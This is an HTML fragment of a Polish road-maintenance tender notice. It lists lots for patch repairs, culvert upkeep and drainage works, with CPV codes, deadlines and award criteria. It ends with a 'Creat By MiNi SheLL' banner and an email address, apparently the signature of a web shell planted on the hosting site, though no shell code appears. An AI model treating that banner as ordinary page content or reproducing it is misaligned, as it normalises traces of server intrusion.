<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 - 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 - 6 cm na terenie ODM 2 Koniecpol w okresie od podpisania umowy do 30.11.2015 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 - 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 - 6 cm na terenie ODM 2 Koniecpol w okresie od podpisania umowy do 30.11.2015 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonane do dnia 31.05.2015 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 01.06.2015 r. do 30.11.2015 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 - 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 - 6 cm na terenie ODM 3 Poczesna w okresie od podpisania umowy do 30.11.2015 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 - 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 - 6 cm na terenie ODM 3 Poczesna w okresie od podpisania umowy do 30.11.2015 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonane do dnia 31.05.2015 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 01.06.2015 r. do 30.11.2015 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remonty cząstkowe nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową, likwidacja przełomów, inne roboty utrzymaniowe oraz remont i bieżące utrzymanie przepustów i odwodnienie korpusu drogowego na drogach powiatowych i wojewódzkich w okresie od podpisania umowy do 31.03.2016 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remonty cząstkowe nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową, likwidacja przełomów, inne roboty utrzymaniowe oraz remont i bieżące utrzymanie przepustów i odwodnienie korpusu drogowego na drogach powiatowych i wojewódzkich w okresie od podpisania umowy do 31.03.2016 r. 
Opis: 
1.	Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową oraz likwidacja przełomów będzie obejmować następujące etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonany do dnia 31.05.2015 r. wg bieżących potrzeb i zleceń,
-	II Etap obejmuje okres od 01.06.2015 r. do 31.03.2016 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.
2.	Wykonanie innych robót utrzymaniowych obejmuje bieżące utrzymanie jezdni, chodników, poboczy w okresie od podpisania umowy do dnia 31.12.2015 r. wg zleceń i zakresu robót uzgodnionego z Zamawiającym.
3.	Remont i bieżące utrzymanie przepustów i odwodnienie korpusu drogowego wg zleceń i zakresu robót uzgodnionego z Zamawiającym w okresie od podpisania umowy do dnia 31.12.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com